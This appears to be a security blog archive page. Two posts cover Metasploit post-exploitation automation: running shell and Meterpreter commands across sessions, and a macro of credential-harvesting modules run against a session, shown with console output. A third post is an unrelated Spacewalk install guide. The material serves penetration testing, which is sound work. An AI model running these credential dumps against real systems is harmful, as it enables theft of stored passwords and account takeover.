Loading post/linux/gather/checkvm
Running Against 6
[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine
Running Against 7
[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine

When it comes to running commands against sessions, there are two types of commands that can be executed: shell commands and Meterpreter console commands. For shell commands the multi_cmd command is available:

msf > multi_cmd -h

OPTIONS:

    -c <opt>  Shell command to run.
    -h        Command Help
    -p <opt>  Platform to run the command against. If none given it will run against all.
    -s <opt>  Comma separated list sessions to run modules against.

You can specify a platform for running the command (bsd, solaris, linux and win), the list of sessions and the command to be executed. On Windows based systems I recommend using the "cmd /c " format, and for Unix type systems use the full path for the command; in both cases you need to wrap the command in quotes. Since post modules and scripts save their data to loot, this command does the same, saving both the command that was run and its output in loot. Let's run ipconfig against all Windows sessions:

msf > multi_cmd -s all -p win -c "cmd /c ipconfig"
Running cmd /c ipconfig against session 2


Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.1.115
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
Running cmd /c ipconfig against session 3


Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.1.113
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
Running cmd /c ipconfig against session 4


Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::9930:cb9f:3b7e:e92d%10
...

Tunnel adapter Local Area Connection* 9:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:4137:9e76:3422:1b95:3f57:fe65
   Link-local IPv6 Address . . . . . : fe80::3422:1b95:3f57:fe65%12
   Default Gateway . . . . . . . . . : ::

Let's run ifconfig against the Linux systems:

msf > multi_cmd -s all -p linux -c "/sbin/ifconfig -a "
Running /sbin/ifconfig -a  against session 6
eth0      Link encap:Ethernet  HWaddr 00:0C:29:97:CD:08  
          inet addr:192.168.1.119  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe97:cd08/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1297491 errors:1 dropped:0 overruns:0 frame:0
          TX packets:51870 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:205739082 (196.2 MiB)  TX bytes:4346662 (4.1 MiB)
          Interrupt:67 Base address:0x2024 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1567 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1567 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2116526 (2.0 MiB)  TX bytes:2116526 (2.0 MiB)

sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

Running /sbin/ifconfig -a  against session 7
eth0      Link encap:Ethernet  HWaddr 00:0C:29:97:CD:08  
          inet addr:192.168.1.119  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe97:cd08/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1297495 errors:1 dropped:0 overruns:0 frame:0
          TX packets:51874 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:205739404 (196.2 MiB)  TX bytes:4348194 (4.1 MiB)
          Interrupt:67 Base address:0x2024 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1567 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1567 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2116526 (2.0 MiB)  TX bytes:2116526 (2.0 MiB)

sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

For running Meterpreter console commands the multi_meter_cmd command is available. It checks whether each specified session is a Meterpreter session before executing, and there is also a resource file driven version of the command:

msf > multi_meter_cmd  -h

OPTIONS:

    -h        Command Help
    -c <opt>  Meterpreter Console Command to run against sessions.
    -s <opt>  Sessions to run Meterpreter Console Command against. Example <all> or <1,2,3,4>

Let's run sysinfo against all sessions:

msf > multi_meter_cmd  -s all -c sysinfo
Running command sysinfo against session 2
Computer        : CARLOS-192FCD91
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Running command sysinfo against session 3
Computer        : TEST-01BCDAF47C
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Running command sysinfo against session 4
Session 5 is not a Meterpreter session!
Session 6 is not a Meterpreter session!
Session 7 is not a Meterpreter session!

As can be seen, the plugin provides many ways to automate post-exploitation tasks during a pentest. As always I hope you find it useful and would love your feedback and any bug reports.

Friday, Dec 16 2011

SpaceWalk 1.5 Basic Installation for Package Management

SpaceWalk is the upstream open source project for the Red Hat Satellite Server for system management. The project is licensed under the GPLv2. Its main function is software content management for Red Hat derived distributions such as Fedora, CentOS, and Scientific Linux in your environment; Debian and Solaris support are experimental at the moment. It also allows us to kickstart systems, as well as manage and deploy configuration files. Spacewalk's monitoring feature allows us to view monitoring status for your systems alongside their software update status. Spacewalk also has virtualization capabilities to provision, control, manage, and monitor virtual Xen guests. It also provides a proxy server for synching files to geographically distributed sites from a central location. This blog post will cover the basic setup of the server and the software channels to start managing software updates in a CentOS environment.

Configuring the Environment for Installing Spacewalk

Test that name resolution is working properly.

ping -c 3 `hostname`

The pings should be successful.

Install the spacewalk repository so it will be available when using yum for installing packages:

rpm -Uvh http://spacewalk.redhat.com/yum/1.5/RHEL/6/x86_64/spacewalk-repo-1.5-1.el6.noarch.rpm

Set the jpackage repository, specifically for version 5.0

cat > /etc/yum.repos.d/jpackage-generic.repo << EOF
[jpackage-generic]
name=JPackage generic
#baseurl=http://mirrors.dotsrc.org/pub/jpackage/5.0/generic/free/
mirrorlist=http://www.jpackage.org/mirrorlist.php?dist=generic&type=free&release=5.0
enabled=1
gpgcheck=1
gpgkey=http://www.jpackage.org/jpackage.asc
EOF

For CentOS 6 a specific version of the SELinux packages is needed, so the CR (Continuous Release) repository must be used:

cat > /etc/yum.repos.d/cr.repo << EOF
[CR-repository]
name=CR Repository
baseurl=http://mirror.centos.org/centos/\$releasever/cr/\$basearch/
enabled=1
gpgcheck=1
EOF

Spacewalk requires a Java Virtual Machine version 1.6.0 or greater. The EPEL repository contains a version of OpenJDK that works with Spacewalk, and other dependencies can be installed from EPEL as well. To get packages from EPEL just install this RPM:

rpm -Uvh http://download.fedora.redhat.com/pub/epel/6/i386/epel-release-6-5.noarch.rpm

At the time of this writing there is a bug with cobbler-web being installed in a Spacewalk server so to make sure it does not get installed it is set as an excluded package in the yum.conf file:

echo "exclude=cobbler-web" >> /etc/yum.conf

Installing Spacewalk

The version of Spacewalk we will be installing is the PostgreSQL version. For this we will need to install PostgreSQL Server and configure it.

Installing and Configuring PostgreSQL

We will use yum to install the database server:

yum install postgresql-server

Initialize the system master database:

service postgresql initdb

Start the service so we can connect to the server and configure it:

service postgresql start

Ensure that the PostgreSQL server will start when the system is rebooted:

chkconfig postgresql on

Create database, user, and plpgsql language there (Change the password variable to a secure one):

su - postgres -c 'PGPASSWORD=spacepw; createdb spaceschema ; createlang plpgsql spaceschema ; yes $PGPASSWORD | createuser -P -sDR spaceuser'

We configure the user to authenticate with an md5 password when connecting to that database. Put lines like the following in /var/lib/pgsql/data/pg_hba.conf before the "all" entries:

local spaceschema spaceuser md5
host  spaceschema spaceuser 127.0.0.1/8 md5
host  spaceschema spaceuser ::1/128 md5

Then we reload PostgreSQL:

service postgresql reload

Configuring Firewall

We must configure the system firewall to allow connections to the ports used by the different services that Spacewalk relies on:

  • Port 80 and 443 for connections to the Web Interface and client connections to the server.
  • Port 4545 for Spacewalk monitoring.
  • Port 5222 for push actions to client machines.
  • Port 5269 for push actions to a Spacewalk Proxy.
  • Port 69 UDP for TFTP if provisioning will be used.

The commands to configure the firewall are:

iptables -D INPUT -j REJECT --reject-with icmp-host-prohibited
iptables -A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 4545 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 5222 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 5269 -j ACCEPT
iptables -A INPUT -p udp -m udp --dport 69 -j ACCEPT
iptables -A INPUT -j REJECT --reject-with icmp-host-prohibited
service iptables save
service iptables restart

Installing the Spacewalk Package

Once all dependencies have been configured we can install the Spacewalk package by issuing the yum command for the PostgreSQL version. During installation we will have to accept several GPG keys for the repositories that were configured to meet the dependencies:

yum -y install spacewalk-postgresql

Initial Spacewalk Configuration

The best way to configure Spacewalk is through the use of a configuration file. The following is an example that can be modified for the initial configuration (make the necessary changes for your environment):

admin-email = root@localhost
ssl-set-org = Spacewalk Org
ssl-set-org-unit = spacewalk
ssl-set-city = My City
ssl-set-state = My State
ssl-set-country = US
ssl-password = spacewalk
ssl-set-email = root@localhost
ssl-config-sslvhost = Y
db-backend=postgresql
db-name=spaceschema
db-user=spaceuser
db-password=spacepw
db-host=localhost
db-port=5432
enable-tftp=Y

Connect to the server to create the administrator account for the default organization.

Use Firefox; for some reason Internet Explorer and Google Chrome have problems when logging in to the server with the newly created administrator account for the first time.

After we have created this account, the server is ready to be used for administering hosts.

Setting Software Channels

Once the first organization is created one can decide on a centralized or decentralized organization model. Red Hat has a great white paper on this: "RHN Satellite: Best Practices for Multiple Organizations".

The first step is to set a Base channel; this channel will contain all base packages for a system. The first Base Channel we will set up is the one for CentOS 6.0, the version of CentOS used for the Spacewalk Server. Follow these steps once logged in:

  1. Click on Channels
  2. Click on Manage Software Channels
  3. Click on Manage Repositories
  4. Click on Create New Repository

GPG Key import

Before we start, one thing to always keep in mind is that the Spacewalk Server will not deploy packages from any repository for which it does not have the GPG public key used to sign the packages. These keys are placed in the root of the version of the repository that one will use. First we download these keys and import them into GPG to get the key ID and fingerprint needed when setting up the channel; they should also be imported with rpm on the Spacewalk server. For the base CentOS repository we download the key and import it with GPG to get the key information:

mkdir repo_keys
cd repo_keys
curl -O http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6
gpg --import RPM-GPG-KEY-CentOS-6

Now that we have the key imported we can use the ID shown in the output to list the key fingerprint to add to the channel definition. It is also advised to import the key with rpm. Create one channel per set of repositories so the keys are easier to manage:

gpg --list-keys --fingerprint C105B9DE
rpm --import http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6

We will follow these steps for every repository for which we will create a channel.

Creating Repositories

We will create 2 Repositories for CentOS 6 the first one will be the base repository for CentOS the second will be the Updates. For the base system repository enter:

  • Repository Label - CentOS6-i386-Base
  • Repository URL - http://mirror.facebook.net/centos/6/os/i386/
  • Then click on Create Repository

For the updates repository enter:

  • Repository Label - CentOS6-i386-Updates
  • Repository URL - http://mirror.facebook.net/centos/6/updates/i386/
  • Then click on Create Repository

For the Spacewalk Client repository enter:

  • Repository Label - spacewalk-client-rhel6-i386
  • Repository URL - http://spacewalk.redhat.com/yum/1.5/RHEL/6/i386/
  • Then click on Create Repository

Let's create a repository for VMware Tools for vSphere 5, if you are using VMware for running virtual machines:

  • Repository Label - VMware-Tools-ESX-5.0-RHL6
  • Repository URL - http://packages.vmware.com/tools/esx/5.0/rhel6/i386/index.html
  • Then click on Create Repository

Creating Channels

We will create a new channel that will use both Repositories:

  1. Click on Channels
  2. Click on Manage Software Channels
  3. Click on Create New Channel

Enter the Following Parameters:

  • Channel Name - CentOS 6 32-bit
  • Channel Label - centos6-i386
  • Parent Channel - none
  • Parent Channel Architecture - IA-32
  • Yum Repository Checksum Type - sha256
  • Channel Summary - 32-bit CentOS 6 channel
  • Under Channel Access Control Select:
    • All users within your organization may subscribe to this channel.
    • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
  • GPG key URL - http://mirror.facebook.net/centos/6/os/i386/RPM-GPG-KEY-CentOS-6
  • GPG key ID - C105B9DE
  • GPG key Fingerprint - C1DA C52D 1664 E8A4 386D BA43 0946 FCA2 C105 B9DE
  • Click on Create Channel

Assign the Repositories to the Channel:

  • Click on Channels
  • Click on Manage Software Channels
  • Click on the name of the channel that was just created
  • Click on Repositories
  • Select the Repositories to be linked to the channel (CentOS6-i386-Base and CentOS6-i386-Updates)
  • Click on Update Repositories

To Sync the repositories

  • Click on Repositories in the channel settings
  • Click on Sync
  • Click on Sync Now to start the synching process
  • Select a scheduling option and interval and click on Schedule

The initial sync can take hours depending on the size of the repository and internet connection speed. Packages will begin to appear slowly on the channel package list as they are downloaded and synched.

Repeat the steps for the Spacewalk Client and the VMware Tools using the settings shown below.

SpaceWalk Client:

  • Channel Name - Spacewalk Client 32bit RHL6
  • Channel Label - spacewalk-client-32bit-rhl6
  • Parent Channel - CentOS 6 32-bit
  • Parent Channel Architecture - IA-32
  • Yum Repository Checksum Type - sha1
  • Channel Summary - Spacewalk Client 32bit for RHL6
  • Under Channel Access Control Select:
    • All users within your organization may subscribe to this channel.
    • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
  • GPG key URL - http://spacewalk.redhat.com/yum/RPM-GPG-KEY-spacewalk
  • GPG key ID - 430A1C35
  • GPG key Fingerprint - B6F4 CBE4 8B8F 45E1 85F8 34B2 9542 3D4E 430A 1C35

Assign the repository spacewalk-client-rhel6-i386 to the channel and set a sync schedule.

VMWare Tools:

  • Channel Name - VMware Tools RHL6 32bit ESX5
  • Channel Label - rhl6-vm-32bit-esx5
  • Parent Channel - CentOS 6 32-bit
  • Parent Channel Architecture - IA-32
  • Yum Repository Checksum Type - sha1
  • Channel Summary - VMware Tools RHL6 32bit ESX5
  • Under Channel Access Control Select:
    • All users within your organization may subscribe to this channel.
    • This channel is public and may be accessed by any of the trusted organizations trusted by this organization.
  • GPG key URL - http://packages.vmware.com/tools/VMWARE-PACKAGING-GPG-KEY.pub
  • GPG key ID - 66FD4949
  • GPG key Fingerprint - 36E4 7E1C C4DC C5E8 152D 115C C0B5 E0AB 66FD 4949

Assign the repository VMware-Tools-ESX-5.0-RHL6 to the channel and set a sync schedule.

For more information on creating repos and synching them do take a look at: Uploading Content

Enable the OSA Dispatcher so we can push jobs immediately to registered systems:

chkconfig osa-dispatcher on
service osa-dispatcher start

Connecting a CentOS 6 System

Before connecting to a CentOS 6 System you need to create an activation key to use for registering the systems and assign a software channel to it. To create an Activation Key we do the following:

  • Click on Systems
  • Click on Activation Keys
  • Click on Create New Key
  • Enter the Following Information
    • Description - CentOS 6 i386 Systems
    • key - centos6-32bit
    • Base Channels - CentOS 6 32-bit
    • Add-On Entitlements - Select Monitoring and Provisioning (You can also choose the Virtualization Entitlements if you wish to use them)
  • Click on Create Activation Key

The key is now ready to use.

To connect the system, the appropriate client software must be installed on it.

We start by installing the appropriate repository for the spacewalk client software:

rpm -Uvh http://spacewalk.redhat.com/yum/1.5/RHEL/6/i386/spacewalk-client-repo-1.5-1.el6.noarch.rpm
rpm -Uvh http://download.fedora.redhat.com/pub/epel/6/i386/epel-release-6-5.noarch.rpm

Install the necessary client software:

yum install rhn-client-tools rhn-check rhn-setup rhnsd m2crypto yum-rhn-plugin osad

We can register the CentOS system to Spacewalk using the activation key we created earlier:

rhnreg_ks --serverUrl=http://YourSpacewalk.example.org/XMLRPC --activationkey=1-centos6-32bit

We need to configure OSAD so we can push actions to this system. We start by downloading the server's CA certificate and pointing the OSAD configuration file at it:

cd /usr/share/rhn/
curl -O http://yourspacewalk.example.org/pub/RHN-ORG-TRUSTED-SSL-CERT
/usr/bin/perl -p -i -e "s/osa_ssl_cert =/osa_ssl_cert = \/usr\/share\/rhn\/RHN-ORG-TRUSTED-SSL-CERT/g" /etc/sysconfig/rhn/osad.conf

We can now set the service:

chkconfig osad on
service osad start

For information on connecting other systems do take a look at Registering Clients.

Caveats

At the time of this writing, in version 1.5 of Spacewalk errata is only imported from Fedora channels, and not all errata is processed. CentOS has not distributed any errata for version 6.x of CentOS, so automating the import of errata is not possible. For previous versions of CentOS the following blog post shows a way to automate the import of the errata information.

Friday, Dec 16 2011

Running Multiple Post Modules

This is a module I wrote to simplify running multiple post modules against a session, for users who do not want to learn Ruby or the API well enough to build a resource file for that task. The module is called multi_post. Let's load the module and see the options it has:

msf > use post/multi/manage/multi_post 
msf  post(multi_post) > info

       Name: Multi Manage Post Module Macro Execution
     Module: post/multi/manage/multi_post
    Version: 14287
   Platform: Windows, Unix, OSX, Linux, Solaris
       Arch: 
       Rank: Normal

Provided by:
  carlos_perez <carlos_perez@darkoperator.com>

Description:
  This module will execute a list of modules given in a macro file in 
  the format of < module > < opt=val,opt=val > against the select session 
  checking for compatibility of the module against the sessions and 
  validation of the options provided.


msf  post(multi_post) > show options 

Module options (post/multi/manage/multi_post):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   MACRO                     yes       File with Post Modules and Options to run in the session
   SESSION                   yes       The session to run this module on.

As we can see it takes a macro file where each post module and its options are written one per line in the format < module > < opt=val,opt=val >. Let's create a macro for running all the credential dumping modules. The macro would look something like this:

post/windows/gather/credentials/wsftp_client
post/windows/gather/credentials/winscp
post/windows/gather/credentials/windows_autologin
post/windows/gather/credentials/vnc
post/windows/gather/credentials/trillian
post/windows/gather/credentials/total_commander
post/windows/gather/credentials/smartftp
post/windows/gather/credentials/outlook
post/windows/gather/credentials/nimbuzz
post/windows/gather/credentials/mremote
post/windows/gather/credentials/imail
post/windows/gather/credentials/idm
post/windows/gather/credentials/flashfxp
post/windows/gather/credentials/filezilla_server
post/windows/gather/credentials/meebo
post/windows/gather/credentials/coreftp
post/windows/gather/credentials/imvu
post/windows/gather/credentials/epo_sql
post/windows/gather/enum_ie
post/multi/gather/ssh_creds
post/multi/gather/pidgin_cred
post/multi/gather/firefox_creds
post/multi/gather/filezilla_client_cred

Now we save the file as cred_dump.rc so we can use it in the module:

msf  post(multi_post) > set MACRO /Users/carlos/cred_dump.rc
MACRO => /Users/carlos/cred_dump.rc
msf  post(multi_post) > set SESSION 1
SESSION => 1
msf  post(multi_post) > run

[*] Running module against WIN2K8R2-01
Loading post/windows/gather/credentials/wsftp_client
Running Against 1
[*] Checking Default Locations...
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....
Loading post/windows/gather/credentials/winscp
Running Against 1
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!
Loading post/windows/gather/credentials/windows_autologin
Running Against 1
[*] Running against WIN2K8R2-01 on session 1
[-] Post failed: NameError undefined local variable or method `d02' for #<#<Module:0x007fc88b0c0e78>::Metasploit3:0x007fc88fd80898>
[-] Call stack:
[-]   /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/windows_autologin.rb:95:in `run'
Loading post/windows/gather/credentials/vnc
Running Against 1
[*] Enumerating VNC passwords on WIN2K8R2-01
[*] Checking UltraVNC...
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[*] Checking TightVNC_HKLM_Control_pass...
[*] Checking RealVNC_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC4_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500...

. . . . . .

[*] Checking for Firefox directory in: C:\Users\Administrator\AppData\Roaming\Mozilla\
[-] Firefox not found
Loading post/multi/gather/filezilla_client_cred
Running Against 1
[*] Checking for Filezilla directory in: C:\Users\Administrator\AppData\Roaming
[*] No users found with a FileZilla directory
[*] Post module execution completed
msf  post(multi_post) >
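As an added example that is not part of the original post or of the plugin and module code, here is a small Ruby parser for the two line formats described above: multi_post_rc resource lines (< session > < module > < options >) and multi_post macro lines (< module > < opt=val,opt=val >). It expands a session spec of "all" or a comma separated id list against the sessions that are actually open, so a stale id in a resource file is dropped instead of failing later. The function names, the '#' comment handling and the split on the first '=' are assumptions, not the plugin's own behaviour.

```ruby
# Added example, not the multi_post plugin/module code.
# Line formats (from the post):
#   multi_post macro:  <module> <opt=val,opt=val>
#   multi_post_rc:     <session> <module> <opt=val,opt=val>
# Session spec is "all" or a comma separated list of session ids.

# Turn "opt=val,opt=val" into a Hash. Split on the first '=' only so a value
# that itself contains '=' survives; a pair without '=' is a malformed line.
# Option names are upcased (assumption) to match how they are usually shown.
def parse_opts(opt_str)
  return {} if opt_str.nil? || opt_str.strip.empty?
  opt_str.split(',').each_with_object({}) do |pair, opts|
    name, val = pair.split('=', 2)
    if val.nil? || name.strip.empty?
      raise ArgumentError, "malformed option #{pair.inspect}"
    end
    opts[name.strip.upcase] = val.strip
  end
end

# Expand a session spec against the sessions currently open in the framework.
# "all" -> every open session; "2,9" -> only those ids that are really open.
def expand_sessions(spec, open_sessions)
  return open_sessions.sort if spec.downcase == 'all'
  ids = spec.split(',').map { |s| Integer(s.strip) }   # raises on junk
  ids.select { |id| open_sessions.include?(id) }
end

# Shared line filter: strip, drop blanks and '#' comments (assumption).
def usable_lines(text)
  text.each_line.map(&:strip).reject { |l| l.empty? || l.start_with?('#') }
end

# Parse a multi_post macro file body: one module per line, options optional.
def parse_macro(text)
  usable_lines(text).map do |line|
    mod, opts = line.split(/\s+/, 2)
    raise ArgumentError, "not a module path: #{mod}" unless mod.include?('/')
    { module: mod, options: parse_opts(opts) }
  end
end

# Parse a multi_post_rc resource file body: <session> <module> <options>.
def parse_rc(text, open_sessions)
  usable_lines(text).map do |line|
    spec, mod, opts = line.split(/\s+/, 3)
    raise ArgumentError, "missing module on line: #{line}" if mod.nil?
    { sessions: expand_sessions(spec, open_sessions),
      module: mod, options: parse_opts(opts) }
  end
end

if __FILE__ == $0
  # Constructed sample input mirroring the post's checkvm.rc; session 9 is
  # not open and is dropped from the second entry.
  rc = "all post/windows/gather/checkvm\n2,9 post/linux/gather/checkvm\n"
  parse_rc(rc, [2, 3, 4, 6, 7]).each { |e| puts e.inspect }
end
```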

As we can see this can be helpful if one wants to create quick macro files to run collections of post modules and use them in an automated fashion, for example with AutoRunScript when running exploits or setting up a multi handler.

As always I hope you find this information useful.
